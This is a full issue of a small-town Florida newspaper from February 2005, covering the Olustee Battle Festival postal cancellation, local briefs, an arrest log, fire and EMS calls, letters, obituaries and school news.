The brave actions of soldiers who died in the Battle of Olustee more than 130 years ago have been honored in many ways. Activities ranging from a reenactment battle to postage stamps have served as proof of how the fallen troops have been revered through the years. During the 27th Annual Olustee Battle Festival this weekend, local residents can pay homage to the troops by purchasing a collector's edition envelope with the Olustee Festival cancellation from the local postal service. The envelopes will be on sale Friday and Saturday beginning at 10 a.m. at the U.S. Postal Service trailer near the Columbia County Courthouse Annex as part of the 27th Annual Olustee Battle Festival festivities.

[Photo] Joseph Wilson, a volunteer with the Lake City Post Office, holds a collector's edition envelope with the Olustee Festival cancellation. The items will be on sale beginning Friday during the 27th Annual Olustee Battle Festival.

Joseph Wilson, a Blue-Grey Army volunteer who also serves as a volunteer with the Lake City Post Office, said he is uncertain how many envelopes have been printed for the 2005 Battle Festival, but they have become collectors' items. He said the stamps have been combined with the Olustee Battle Festival so people all over the United States will know about the Olustee Battle Festival. "There are some special envelopes that have been printed that go back about 4 or 5 years and they've been framed," Wilson said of items available for this year's festival. He said they can be purchased for $25. "We'll also have regular stamps," he said.
Wilson said this year's cancellation image has a silhouette of two crossed flags, one northern and the other southern. A purple heart sits between the two flags. "By popular demand, we are going to use the Purple Heart stamp again," he said. "We're also going to have goodies for children — coloring books, crayons, and other miscellaneous items." Wilson said Duffy Soto, a Lake City artist, contributed to the design of the cancellation, which is located on the upper-left portion of the envelope and contains a small duplicate image of Soto's 2005 Olustee Reenactment Battle Festival. Wilson said the cancellation has become an annual part of the festival. "We have the cancellation every year because we get the OK from the high command to use it, and it contains the date just for those two days," he said. "This has been going on for some time, not just here in Lake City, but all across the United States for different functions. Our cancellation is unique because it's an original by Duffy Soto, who, as usual, does that every year." This year some of the proceeds from the cancellation sales will go to the Lake City Purple Heart Organization for local veterans.

TODAY: Classified 4B | Comics 3B | Local & State 3A | Business 5A | Obituaries 6A | Opinion 4A | Puzzles 4B | Scoreboard 2B | World 12A | Weather 2A

LAKE CITY REPORTER — How to reach us: Main number (386) 752-1293. To place a classified ad, call 755-5440. Advertising Director Karen Craig, 754-0417, craigi@lakecityreporter.com.
Lottery
MIAMI — Here are the winning numbers in Monday's Florida Lottery: Cash 3: 5-5-4. Play 4: 9-6-2-8. Sunday's Fantasy 5: 19-21-23-27-35.

Correction
The Lake City Reporter corrects errors of fact in news items. If you have a concern, question or suggestion, please call the executive editor. Corrections and clarifications will run in this space. And thanks for reading.

"Copyrighted Material — Syndicated Content — Available from Commercial News Providers"

[Advertisement] Little Caesars — 363 SW Baya Dr., 961-8898; Hwy 47 & I-75, 755-1060. Offer limited to first 150 customers of the day.

LOCAL & STATE

Masonic Lodge plans Youth Night Celebration Thursday
By TODD WILSON
twilson@lakecityreporter.com
Lake City Masonic Lodge No. 27 will host a Youth Night Celebration at the group's lodge Thursday. The event begins at 7 p.m. at the lodge at 2685 McFarlane Ave., and is open to the public. The Youth Night theme is designed to showcase young people from several areas of the community and invite the public for the free performance. "We want people to come in and enjoy this event and see the Masonic Lodge, see what we're all about," said Jerry Morgan, Lake City Masonic Lodge activities chairman. "We've stayed behind our four walls for too long. We want to reach out and be more involved in the community." The Youth Night activities will feature several performances from Columbia County school groups and individuals. The night will begin with the presentation of the colors by the Columbia High School Army JROTC unit, followed by the pledge of allegiance. The National Anthem will be sung by Caitlin Eadie, an accomplished Lake City singer. She will perform two additional songs during the program.
Following the National Anthem, the JROTC unit will perform its eight-minute precision floor-drill routine for the crowd. The "Fancy Dancers," a Columbia County dance group, also will perform during the event. "This is a school night, so we won't keep these kids out very long," Morgan said. "This whole event will take less than an hour." The Youth Night Celebration will end with John Leaman, a member of the Cherry Hill Masonic Lodge No. 12 at Fort White, playing guitar and singing "The Mason's Prayer." Refreshments will be served to the public following the event. "We want anyone to come out and be with us," Morgan said. "We want people to get to know us."

LCCC to host science fair
Lake City Community College will host the Suwannee Valley Regional Science and Engineering Fair Feb. 22-24 in Howard Gymnasium. The fair will include about 130 student projects in the fields of behavioral and social science, chemistry, biochemistry, botany, computer science, earth and space science, engineering, environmental, medicine and health, microbiology, physics and zoology. The region is comprised of 10 counties: Columbia, Union, Suwannee, Bradford, Hamilton, Lafayette, Baker, Gilchrist, Dixie and Madison. Regional community business leaders will judge the projects 8:30 a.m. to 3:30 p.m. Feb. 23, with an open house for the community from 4-6 p.m. The awards ceremony will be 7 p.m. Feb. 24 at the high school in Union County. The winners will participate in the State Science and Engineering Fair in Orlando April 6-8.

Parade to honor area veterans
The Blue-Grey Army, Inc., the sponsoring organization for the Olustee Battle Festival, will honor veterans and service members who fought or were stationed in Iraq, Kuwait or Afghanistan. There will be special seating made available for these military members at the parade 10 a.m. Saturday. For more information, call Faye Bowling-Warren at 755-1097.
Rodeo pageant set for March 20
The Miss Florida Gateway ProRodeo Pageant will be March 20 at the 11th Annual Florida Gateway ProRodeo. Participants can win scholarships, savings bonds, tiaras, buckles and more. Applications are available at Smitty's Western Store, The Money Man, the fair office, Fort White High School, Columbia High School, Lake City Middle School and Richardson Middle School. For more information, call 752-8822 or see the Web site at www.columbiacountyfair.org. Columbia County Resources has two $1,000 scholarships for graduating seniors. Applications and criteria are available at FWHS and CHS, the fair office and the Web site.

Pageant sign-up under way
WHITE SPRINGS — Registration is under way for the 2005 Little Miss Azalea Contest. This competition is for girls up to 10 years of age from Hamilton, Suwannee and Columbia counties. The winner will be crowned at the Suwannee River Wild Azalea Festival in White Springs March 19. Contestants can register at the White Springs Town Hall at the corner of Collins and Jewett Streets and receive a sponsor sign-up sheet. Deadline to turn in all sponsorship donations is 4 p.m. March 11. Presentation of awards will be at the music stage at the Florida Nature and Heritage Tourism Center. For more information, call 397-2310.

Library book sale begins April 9
The Friends of the Library, Alachua County Library District, will have its annual spring book sale April 9 through 13 at the Friends of the Library Book House, 430 N. Main St., in Gainesville. Hours are 9 a.m. to 6 p.m. April 9, 1-6 p.m. April 10, noon to 8 p.m. April 11 and 12, and 10 a.m. to 6 p.m. April 13. For more information, call (352) 375-1676.
Compiled from staff reports

POLICE: Arrest Log
The following information was provided by local law enforcement agencies. The following people have been arrested but not convicted. All people are presumed innocent unless proven guilty.

Tuesday, Feb.
8
Columbia County Sheriff's Office
- William David Bishop II, 2425 S.W. Newark Drive, Fort White, aggravated assault with a deadly weapon and improper exhibition of a dangerous weapon.

Thursday, Feb. 10
Columbia County Sheriff's Office
- George Robert Spivey, 42, 394 S.W. Buffalo Court, failure to register as a sex offender.
- Shannon Carter Stamper, 32, 276 SW Merciful Place, Fort White, possession of cocaine and possession of drug paraphernalia.
- Janice Wilson Thomas, 41, 4347 284th St., Branford, possession of a controlled substance and five counts of possession of drug paraphernalia.
- Allethia Charentell Brooken, 32, 3541 Victoria Park Road, Jacksonville, warrants: violation of community control on original charges of two counts of grand theft, five counts of forgery and five counts of uttering a forgery.
- Alfredo Lee Johnson, 22, 835 Georgia Place, warrant: third-degree grand theft and two counts of uttering a forgery.

Friday, Feb. 11
Columbia County Sheriff's Office
- Sherrie Denise Jackson, 35, 978 N.W. Oakland St., armed burglary and grand theft.
Lake City Police Department
- Richard Earl Gardner Sr., 46, 515 N.E. Hernando Ave., aggravated assault and resisting an officer without violence.
- Charles Richard Brush, 18, 232 S.W. Vista Terrace, possession of drug paraphernalia and possession of cocaine.

Saturday, Feb. 12
Columbia County Sheriff's Office
- Amy Neshea Yawn, 21, 1461 N.W. Baughn St., fraudulent use of credit cards, grand theft, forgery and uttering a forged instrument.
- Willie Frank Yawn, 21, 1461 N.W. Baughn St., fraudulent use of credit cards and grand theft.

[Advertisement] Microdermabrasion, 752-4888. 21st Annual Baby Contest & Model/Beauty Search — America's Cover Miss. Age Divisions — Girls: Birth-11mo, 12-23mo, 2-3yr, 4-6yr, 7-9yr, 10-12yr, 13-15yr, 16 & up; Boys: Birth-2yr. & 3yr. Over 2 MILLION $$$ in cash and prizes awarded yearly! Qualify today to win a $10,000.00 bond at 2005 finals.

Lake City
Police Department
- Winston Arthur Bell, 46, 157 S.W. Musket Place, aggravated battery with motor vehicle and assault.
- Bubby Keegan Hildreth, 19, 532 Hillside Drive, Daytona Beach, possession of cocaine, possession of less than 20 grams of marijuana and possession of drug paraphernalia.
- Todd Christopher Smith, 20, 5820 Nohill Blvd., Port Orange, possession of cocaine, possession of less than 20 grams of marijuana and possession of drug paraphernalia.

Sunday, Feb. 13
Lake City Police Department
- Harold Roy Crews, 42, homeless, grand theft auto, possession of cocaine, possession of drug paraphernalia and resisting officer without violence.

Fire, EMS Calls
Sunday, Feb. 13
- 2:08 a.m., rescue assist, 353 Lehigh Lane, one primary unit responded.
- 9:26 a.m., rescue assist, children locked in car, 4066 Horseshoe Loop, two primary units responded.
- 11:16 a.m., brush fire, State Road 47 South, one primary and two volunteer units responded.
- 11:50 a.m., gas leak, 355 Short Lane, four primary units responded.
- 1:35 p.m., brush fire, Marcus Road, one primary and three volunteer units responded.
- 2:11 p.m., brush fire, Federal Road, one primary and three volunteer units responded.
- 2:14 p.m., forestry fire, Marcus Road, two volunteer units responded.
- 2:48 p.m., brush fire, 4454 Wilson Springs Road, two primary and three volunteer units responded.

[Advertisement] Pageant information or a brochure: call (850) 476-3270 or (850) 206-4569. Event locations: March 12, Orange Park Mall; March 13, Lake City Mall. Register: 1:30 p.m. Email: covermiss@aol.com.

[Advertisement] Children's Boutique — Huge Inventory Blowout, 20%-50% off storewide*, today thru Saturday, Feb. 19th only. 363 SW Baya Drive (next to KFC), 961-9696. *Some exclusions apply.

[Advertisement] ServiceMaster — Residential/Commercial Services: Fire & Water Restoration, Carpet/Upholstery Cleaning, Mold Remediation. 755-7522, 663 SE Baya Ave., Lake City, FL 32025.
- 2:54 p.m., brush pile fire, Chickadee Way, one volunteer unit responded.
- 5:55 p.m., brush fire, Landress Terrace, one volunteer unit responded.
- 6:59 p.m., nuisance fire, El Prado Avenue, one primary unit responded.
- 7:44 p.m., rescue assist, Guerdon Street, three volunteer units responded.
- 9:48 p.m., wreck, U.S. 90 West and Bascom Norris Drive, one primary unit responded.
- 10:19 p.m., breaker box fire, Martin Oaks mobile home park, two primary and one volunteer unit responded.

Monday, Feb. 14
- 1:32 a.m., gas leak, South Main Boulevard, three primary units responded.
- 10:25 a.m., rescue assist, 998 N.W. Virginia St., one primary unit responded.
- 11:47 a.m., wreck, State Road 247 and Troy Road, one primary and one volunteer unit responded.
- 3:49 p.m., wreck, U.S. 90 East at Vickers Terrace, one primary unit responded.
Compiled from staff reports.

[Advertisement] IF WE CAN'T WIN, NO ONE CAN! Former Social Security executives and associates. Even if you've been turned down before, call now! Initial claims, reconsiderations, and hearings.

[Advertisement] Finally, a checking account that you can really get excited about: Ultimate Checking from Atlantic Coast Federal. It's the account that pays you interest like a money market account, with the convenience of full-service checking. Earn 2.00% APY* on deposits of $5,000 or more. And this rate is guaranteed until July 31, 2005!

LAKE CITY REPORTER — Serving Columbia County since 1874
Michael Leonard, Publisher; Todd Wilson, Editor; Sue Brannon, Controller
The Lake City Reporter is published with pride for residents of Columbia and surrounding counties by Community Newspapers Inc. of Athens, Ga. We believe strong newspapers build strong communities. Our primary goal is to publish distinguished and profitable community-oriented newspapers.
This mission will be accomplished through the teamwork of professionals dedicated to truth, integrity, loyalty, quality and hard work. Dink NeSmith, President; Tom Wood, Chairman.

For Rodney was one of our own
The Lake City Reporter family suffered a loss a week ago today. Rodney Lord, an employee at this newspaper for more than 30 years, passed away. He was 55. During his career, Rodney worked in several capacities in the composition and production departments of this newspaper. For a time, he was a pressman, rolling the machines every day to make sure the newspapers of his beloved Lake City community reached the doorstep on time and with a top-quality look. Rodney's career spanned an interesting time in the newspaper industry, and probably a span that has seen the most intense changes in the business. Early on, Rodney and his co-workers worked with typewriters and Linotype to firmly set the type for the pages and the awaiting presses. He adapted through the paste-up generation when computers first made their entrance, and most recently worked his daily shift with the night crew, converting computer-produced page files into documents suitable for high-speed Internet transfer to our press plant. A lot changed in the newspaper workplace during Rodney Lord's lifetime, but he adjusted and thrived without complaint or regret. He loved the newspaper business. In recent years, he battled severe health problems, but was always reliable in the office. Even on days when it was obvious he didn't feel his best, he started his shift with a quick walk through all of the paper's departments, wishing everyone goodwill and giving best regards with a quick wit and a smile. Rodney was a good person. He was remembered as such through tears and laughter as friends and family gathered for a memorial visitation over the weekend and recounted special times from his life. Our deepest sympathies are extended to his family. Rodney will be missed.

Today in History
In 1820, American suffragist Susan B. Anthony was born in Adams, Mass. In 1879, President Hayes signed a bill allowing female attorneys to argue cases before the Supreme Court. In 1898, the U.S. battleship Maine mysteriously exploded in Havana harbor. In 1942, Singapore surrendered to the Japanese during World War II. In 1961, 73 people, including an 18-member U.S. figure skating team en route to Czechoslovakia, were killed in a plane crash.

LETTERS TO THE EDITOR

How about a Monday paper?
I read yet another editorial in the Saturday, Jan. 8, 2005, issue of your newspaper concerning what the Columbia County Commission should be about in regard to travel by the commissioners in this county. Enough is enough. If you want to try and accomplish something constructive, why not figure a way for your newspaper to get into the 21st century and ensure that the Lake City Reporter is delivered to your subscribers, and available for others to purchase, each day of the week. It is a sad commentary that the events each weekend in our area which are newsworthy, and news from the sports world, are not available to us until Tuesday. It seems that your newspaper is counting on the AP, and other news agencies, to cover for you each weekend, and they do; however, local news of interest is not available to keep your readers abreast of what is happening in our area. If you are not authorized to publish, print, and distribute your newspaper seven days a week, why not publish a paper and deliver it each Monday, and not have a paper on Tuesday? Advertisements generally, including flyers, are not that intense in your newspaper until Wednesday-Saturday of each week anyway. This change would better serve the public and certainly would not adversely affect your accounts receivable from those who advertise in your newspaper. I would appreciate you taking this suggestion under advisement.
I would also ask the other readers of your newspaper to contact your newspaper with their opinions and comments. This area of Florida has grown to the point that a good, reliable, local newspaper should be available to us on a daily basis.

Charles A. Morgan, Lake City

What about drinking water?

You ran three excellent articles in Sunday's paper concerning future land development for Columbia County. You did a fine job of presenting the information everyone needs to know about where we live and how we must really be careful with our water supply. Much less has been said about the fact that many residents are drinking the ground water. Their health is at risk if we continue with septic tanks and poor quality runoff into sinkholes.

Frank Sedmera, Lake City

PHIL HUDGINS

Final tests for Dixie challenge

OK, so I'm not 100 percent Dixie. I'm 89 percent. You don't know what I'm talking about, do you? Let me explain. One of my friends e-mailed me a quiz called "Yankee or Dixie?" It contains 20 multiple-choice questions. (You can test yourself at www.angelfire.com/ak2/intelligencerreport/yankeedixiequiz.html) Many of the questions deal with pronunciations. For example, do you pronounce "caramel" as 1. Car-ml? 2. Car-a-mel? 3. Either? 4. Don't know. My answer was "car-a-mel," which, the quiz said, is common on the Atlantic coast and southern United States. That's the right answer for a Southerner. But I gave an answer from the Great Lakes region and northeast United States on this question: "What's that bug that rolls into a ball when you touch it? 1. Roly poly? 2. Pillbug? 3. Potato bug? 4. Sow bug." My answer was "pillbug." But the answer most common in the Southeast, the study said, is "roly poly." Honestly, my first answer would have been a "tumble bug," which is what my daddy, when he was in mixed company, called the bug that hung around the business side of an outhouse. But what idiot would touch a tumble bug?
Mary Long of Lawrenceville, Ga., agreed. She is a certified priviologist, which means she gives programs on privies, or outhouses. "I heard those bugs help keep the ecological balance," she said, sounding like a teacher, which she was before retiring and taking up priviology. "You know, this is terrible, but I read that the flatulence of cows and other animals helps keep us balanced." Suddenly, we had gotten off the subject. So I called some entomologists, which is a fancy word for people who know bugs. "We just talked about them in class," said Dr. Mike Waldvogel of the North Carolina Cooperative Extension. His answer was "roly poly," I guess because he's been away from his native New York City long enough to know some Southern. And then he talked about "dog flies," so-called because they congregate around dogs. "The answer is to bathe the dog," he said, "but no Southerner wants to do that because the dog is under the house anyway." We were off the subject again. "I call them both pillbugs and roly polies," said Mandy Comes, a lab technician at Rockingham (N.C.) Community College who orders bugs from catalogs, in which "pillbug" is preferred. By the way, she scored 54 percent Dixie. She grew up in southwest Virginia. Dr. Eric Benson, Extension entomologist at Clemson University, said he would have answered "pillbug." He's originally from New Jersey. But his secretary, Tammy Morton, is a pure, undiluted Southerner. "Haven't you ever played with a roly poly?" she asked me. "They look like a little armadillo." Incidentally, she scored 100 percent Dixie. I guess 89 percent Dixie is not bad. I did spend some time in D.C. and Massachusetts. At least 11 percent of those regions must have stuck with me. Think I'll go get a soda.

Phil Hudgins is senior editor of Community Newspapers, Inc. Contact him at phudgins@cninewspapers.com.

OPINIONS WANTED. BY MAIL: Letters, P.O. Box 1709, Lake City, FL 32056; or drop off at 180 E. Duval St. downtown.
BY FAX: (386) 752-9400. BY E-MAIL: twilson@lakecityreporter.com

LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005

BUSINESS

Verizon agrees to buy MCI for $6.75 billion

LOCAL & STATE

Fort White considers cemetery database

Paul Sehy, an Ichetucknee Springs State Park volunteer, drives a tractor, which aids in the demolition of a produce shed Monday, as part of a park project to protect Rose Sink.

Officials begin demolition work to protect Rose Sink

By ASHLEY CISNEROS
acisneros@lakecityreporter.com

FORT WHITE: The Fort White Town Council received a proposal for the possible development of a database and mapping system for its cemeteries. Aubrey Stanton Adams submitted a proposal detailing his services and provided three bids for three different levels of "specificity." The proposal comes after a situation in the town where a family needed to bury a loved one and could not find its space in the cemetery due to lack of proper records. Adams, who is skilled in graphic design and database management, offered examples of his experience in providing his services for other cemeteries.
"What I have presented here includes a simple plan, a medium plan and a top-quality plan," Adams said. The differences in price would reflect the degree of accuracy and precision put into the zoning. His plan would seek to identify who is buried in the cemetery and where exactly the person is buried. "Each burial would be assigned an alpha-numerical marking such as A-5 or F-10, so that families would know exactly where their loved ones are buried, and it could also be determined where vacancies exist," he explained. Adams described the first step in the project as finding the boundaries of the cemetery and the exact dimensions of the property. Next, the cemetery would be divided and subdivided into zones. Although Adams did find records concerning Fort White's cemeteries on the Internet, he suspected that they were not up-to-date. "I found a list with more than 650 names of people buried here, and while it is good to start with, I don't know how current that information is," he said. John Gloskowski, councilman of district three, was concerned about potential unmarked graves. "What about people who are already there?" he said. "How will you know if there are no markings?" Adams then described a system where he can take a rod and place it into the ground to detect whether or not a coffin is buried. In addition, he also mentioned another method using radar, but commented that it would be more expensive than the rod method. Truett George, mayor of Fort White, suggested tabling the issue until the council could read Adams' proposal more carefully. "I want to see something done about this," he said. "But we need to get more informed about what exactly we need and what options we have." Such options include getting volunteers to survey the cemeteries, instead of paying for the service, he said. Adams said that he was concerned that not all volunteers may have the computer and graphic design skills needed for a thorough database and map.
In other business, the council approved hiring Watertech, Inc. of Haines City to handle replacing charcoal media in the town's three water filters. The $9,900 project should be completed before the next water samples are taken at the end of March, said Public Works Director Edmund Hudson.

By TONY BRITT
tbritt@lakecityreporter.com

COLUMBIA CITY: The demolition of a produce shed on State Road 47 may seem like rejuvenation for the small community, but it's actually a way of protecting the environment. The demolition of the shack, which stood less than 100 yards from a sinkhole, is a sign of progress as Ichetucknee Springs State Park officials begin a restoration project to protect Rose Sink. Monday morning, Jackie Sheffield, park ranger; Paul Sehy, park volunteer; Nick Turner, correctional officer with the Lancaster Correctional Institute in Trenton; and more than 10 inmates demolished the decrepit produce stand near the sinkhole. "This is part of our restoration project to protect Rose Sink and we're removing some old buildings," said Tom Brown, Ichetucknee Springs State Park manager. "We also plan to put in a water retention structure on the north end of the property. We'll fence it off and use it as an educational opportunity to let people know about water issues in the area." The property, sitting near the intersection of County Road 240 and SR 47, was purchased from the landowners nearly three years ago as part of Gov. Jeb Bush's Florida Springs Initiative. Brown said the demolition work was part of the park's long-range plan to protect sinkholes in the area, and another building on the site will be disassembled and moved. "This will be a perfect opportunity to show the people on the basin tour some of the projects that we're doing to protect significant pieces of property in the watershed," he said.
The Ichetucknee Springs Basin Working Group has scheduled a field trip of the Ichetucknee Springs Basin for today, which will include a stop at Rose Sink, where officials will discuss cave exploration and land acquisition at the site. Three local sinks will be visited as part of the tour. The Ichetucknee trace is described as everything from Alligator Lake to the head spring at Ichetucknee Springs State Park, and anywhere there is an opportunity for water to go into a significant geologic feature such as Rose Sink. Brown said it's important to protect all such features as a means of protecting water quality. "We're trying to protect that structure (Rose Sink) because it's directly tied to the head springs," Brown said. "Anything that goes in there shows up sometimes within six hours or within a week at the head springs." The funding for the demolition and restoration of the area is also paid through the governor's Springs Initiative. The Florida Department of Transportation is also scheduled to help build the water retention structure on the site. No date has been given for when construction of the water retention structure will begin because an archaeological survey has to be completed by the state Division of Resources.

Obituaries

Maude Oween Beecher

Mrs. Maude Oween Beecher, 76, of Lake City died Friday morning, February 11, 2005 at Alachua General Hospital in Gainesville. The daughter of the late Dewey Chesser and Lois O'Neal Chesser, Mrs. Beecher had been a resident of Lake City since 1968, coming here from Miami, Florida. She was a homemaker, as well as a loving mother, grandmother and great-grandmother who enjoyed spending time with her family. She loved to knit and paint artwork. Mrs. Beecher is survived by her husband of 39 years, Charles "Chuck" Beecher, Lake City; one son, Jerry Stricklen,
Brooksville, Florida; one daughter, Bonnie Morse (Kenneth), Spokane, WA; and one sister, Monteen Scoggins, Panama City, Florida. Four grandchildren, four great-grandchildren, as well as numerous nieces and nephews also survive. A memorial service for Mrs. Beecher will be conducted on Thursday, February 17, 2005 at 11:00 A.M. at Gateway-Forest Lawn Chapel. In lieu of flowers, memorial donations may be made to the American Cancer Society, 2119 SW 16th Street, Gainesville, Florida 32608. Arrangements are under the direction of GATEWAY-FOREST LAWN FUNERAL HOME, 3596 South Highway 441, Lake City. 386-752-1954. Please sign the guestbook at

Francis Joseph "F.J." Dicks

Mr. Francis Joseph "F.J." Dicks, 88, of Lulu died Monday, February 14, 2005, at the Lake City Medical Center. Funeral arrangements are incomplete at this time but will be available after noon today. Arrangements are under the direction of GATEWAY-FOREST LAWN FUNERAL HOME, 3596 S. HWY 441, Lake City. (386) 752-1954.

Hendrik Dinkla, Jr.

Mr. Hendrik Dinkla, Jr., 87, of Lake City died Saturday evening, February 12, 2005 at the Jenkins Veterans Domiciliary Home in Lake City. A native of Holland, Michigan, Mr. Dinkla moved to Lake City three years ago from Florahome, Fl. Mr. Dinkla was a veteran of the United States Army, having served in the South Pacific during WWII, and was a Lutheran by faith. Mr. Dinkla is survived by one brother, William P. Dinkla (Della), Jacksonville, and numerous nieces and nephews. No services are scheduled at this time. Cremation arrangements are under the direction of the GATEWAY-FOREST LAWN FUNERAL HOME, 3596 South Highway 441, Lake City. 386-752-1954. Please sign our guestbook at

George William Yaeckel, Sr.

Mr. George William Yaeckel, Sr., 84, of McAlpin died Saturday morning, February 12, 2005 at his home. A native of Brooklyn, New York, Mr. Yaeckel moved to McAlpin 35 years ago, coming from Miami. Mr.
Yaeckel was a veteran of the United States Navy and of the Catholic faith. He was retired from Pan American Airlines; he enjoyed reading and woodworking. Mr. Yaeckel is survived by one son, George W. Yaeckel, Jr., McAlpin; two daughters, Susan Fowler (Robert), Harrod, Ohio, and Patti Ferrero (Dr. Frank), Lake City; and eight grandchildren: Sgt. Ryan Smith USMC, Twenty Nine Palms, CA; Kimberely Ferrero, Gainesville; Ashley Ferrero, Francesca Ferrero, Christopher Ferrero and Shawn Ferrero, all of Lake City; and George W. Yaeckel, III, and Travis Donald Yaeckel, Apollo Beach, Florida. No services are scheduled at this time. In lieu of flowers, please make donations to the American Cancer Society, 2119 SW 16th Street, Gainesville, Florida 32608 or the Suwannee County Regional Library, 184 Ohio Ave. South, Live Oak, FL 32064. Cremation arrangements are under the direction of the GATEWAY-FOREST LAWN FUNERAL HOME, 3596 South Highway 441, Lake City. 386-752-1954. Please sign the guestbook at

Raymond C. "Ray" Williamson

Mr. Raymond C. "Ray" Williamson, 58, of Lake City, died Saturday evening in the Lake City Medical Center E.R. following a sudden illness. A native of Madison, Florida, Mr. Williamson had been a resident of Lake City since 1997, having moved here with his family from West Valley, Utah. He was the son of the late Delbert & Eliza Buchanan Williamson. Mr. Williamson served a mission for the Church of Jesus Christ of Latter Day Saints in the California North Mission Field and was a veteran, having served in the U.S. Marine Corps. He graduated with a B.A. degree in Criminal Justice from Florida Atlantic University. He was a retired police officer, having served in Palm Beach, Osceola and Martin Counties. He then worked for nine years in the Personal Protection Department of the Church of Jesus Christ of Latter Day Saints in Salt Lake City, Utah. In 1997 Mr.
Williamson began working with the White Foundation, where he was still employed as a Case Manager. Mr. Williamson was a member of the Church of Jesus Christ of Latter Day Saints Lake City 1st Ward; he was a former Bishop and current Stake High Council member, and was a faithful, lifelong member of the Church. His favorite hobby was his family. He is dearly loved by his wife and family; he was a wonderful husband, father and grandfather. "We will miss him, but we know that we will be together again." Mr. Williamson is survived by his wife of thirty years, Susan "Sue" Williamson; his children, Colin Williamson, Billy Williamson, Clinton Williamson (Rachael), Mandy Williamson and Stacy Williamson, all of Lake City, and Kelly Casazza (Nick) of Clinton, Utah; his granddaughter, Kylie Casazza, Clinton, Utah; his five brothers, Leon Williamson, New Mexico; Albert Williamson, Utah; Jimmy Williamson, Madison, Florida; Tommy Williamson, Utah; and Wayne Williamson, Utah; and his three sisters, Christine Johnson, Ollie Jones and Myrtle Adams, all of Utah. Funeral services for Mr. Williamson will be conducted at 11:00 A.M., Tuesday, February 15, 2005 in the Church of Jesus Christ of Latter Day Saints with Bishop Mark Duren conducting. Interment will follow in the Midway Baptist Church Cemetery in Madison, Florida. The family received friends at the Church from 4-7 Monday evening. Arrangements are under the direction of the DEES FAMILY FUNERAL HOME & CREMATION SERVICES, 768 West Duval Street, Lake City. 961-9500.

Obituaries are paid advertisements. For details, call the Lake City Reporter's classified department at 752-1293.
NATION & WORLD

Final Charles' album sweeps Grammys

HEALTH

Trip tips for you and your family

By Stephanie Sarkis

Parents have asked me for tips on traveling with children during the upcoming Spring Break. Whether you are traveling by car or plane, it pays to plan ahead. If your child has problems with his ears, like recurrent ear infections, check with your doctor before going on a plane flight. The change in air pressure during the flight may cause pain for children who have chronic difficulties with their ears. Give children gum to chew on takeoff and landing.
For infants, nurse them or give them a bottle during takeoff and landing. These two activities help reduce pain in children's ears. Bring snacks and plenty of water. It is very important to keep kids hydrated, especially during warm weather. Set realistic goals for your trips with children. When on a car ride, you will need to stop more often. If your children act up in the car, find a safe place off an exit, stop the car and wait. When the inappropriate behavior subsides, continue on your trip. Traveling as a family can be a fun and rewarding experience. It pays to plan ahead!

Stephanie Sarkis, PhD, is a Licensed Mental Health Counselor. Contact her at mail@stephaniesarkis.com or 758-2055.
Bulletin Board

STUDENT PROFILE

Name: Chrissie Reichert
School: Summers Elementary
Parents: Dr. and Mrs. Richard Reichert
Age: 11
Grade: Fifth
Principal: Art Holliday
Clubs and/or organizations, both in and out of school, to which you belong: Gifted, tennis, Awana
What would you like to do when you complete your education? Continue playing sports and possibly choose a career involving animals.
Achievements: First place County Science Fair, Honor Roll, AR Goal parties, Duke Talent Search
What do you like best about school? Teachers, friends and most of all the experiments.
Teacher's comments about student: Chrissie is an awesome student who is always eager and willing to learn. Her jolly personality is extremely contagious, adding much joy to the class.
Principal's comments concerning student: Chrissie is a student you will never see without a smile on her face. She is a delight to talk to, whether you are an adult or student, and an awesome role model for all.
Student's comment on being selected for "Student Focus": I feel privileged that I was selected.

Richardson Middle

COURTESY PHOTO: Danny Owens, assistant principal (left); Raymond Macatee (right); Steve Hentzelman, band director; and students, in AB order: Charley Civis, Sarah Dooley, Alyssia Freeman, Shaquille Jones, Bobby McNeil, Trey Regar and Jonathan Sheider.

Raymond Macatee has single-handedly donated 204 wind instruments, valued at approximately $175,000, and two equipment trailers valued at $5,000 to the secondary schools' band programs in the Columbia County School System. His business partnership project is called "Scrap to Music." Ray is not a wealthy man, so where does he get the money? From people who donate scrap metal, which he sells to buy instruments for students who need them. His motto: "We provide musical instruments for kids who can't afford them," Raymond said. He also donated $1,700 to the elementary chorus programs, and in 1995 began a $2,500 music scholarship at Lake City Community College. The driving force behind Raymond Macatee is summed up in the following quote: "True happiness comes only to those who dedicate their lives to the service of others." This is Raymond's main purpose in life.

Eastside Elementary

For the second consecutive year, Eastside is participating in the "School and Youth Program" for the North Florida Leukemia and Lymphoma Society. It is important for children to learn that one person can make a difference.
School and Youth involves students, their families and the community in raising funds to research cures and help families with children who have blood cancers: leukemia, lymphoma, Hodgkin's disease and myeloma. Last year, leukemia took the lives of 24,000 children in the state of Florida alone, and it is predicted that this year another 10,000 children will be diagnosed with this disease. Leukemia is the No. 1 killer of children and young adults from birth to age 20. Eastside is raising the money in the memory of Jeffrey Allen Zimmerman. Our goals are: To help the children and families who have this disease. To be No. 1 in the district so our school can receive the Radio Disney Party. To raise at least $2,000. Last year the goal was $2,000, and with the help of students, friends, neighbors and businesses, the school raised a little over $3,000 and came in fourth in the district. If you would like to help us, you can send your donation (please make checks payable to the Leukemia and Lymphoma Society) to: Eastside Elementary, c/o Betty Radcliff, 256 S.E. Beech Street, Lake City, FL 32025.

Fort White Elementary

Fort White Elementary is proud to be hosting its annual Family Reading Night, Thursday. A book fair will be held in the Media Center from 4:30-8 p.m. The PTO meeting will be held at 7 p.m. in the auditorium. Guest readers will be on hand to make this an enjoyable event. Refreshments will also be served. The School Advisory Council meeting will be held at 6 p.m. in Amy Martin's room.

Melrose Park Elementary

Melrose Park is working hard on their attendance. The school would like to commend the following classes for having 100 percent attendance with no tardies this past week: Ms. Smithy, Ms. Moseley, Ms. Gwynn, Ms. Kamback, Ms. Johns, Ms. McAdams, Ms. Lawrence and Ms. Ward. Every Friday is Spirit Day at Melrose Park. Several classes showed their spirit. These students had red and white shirts.
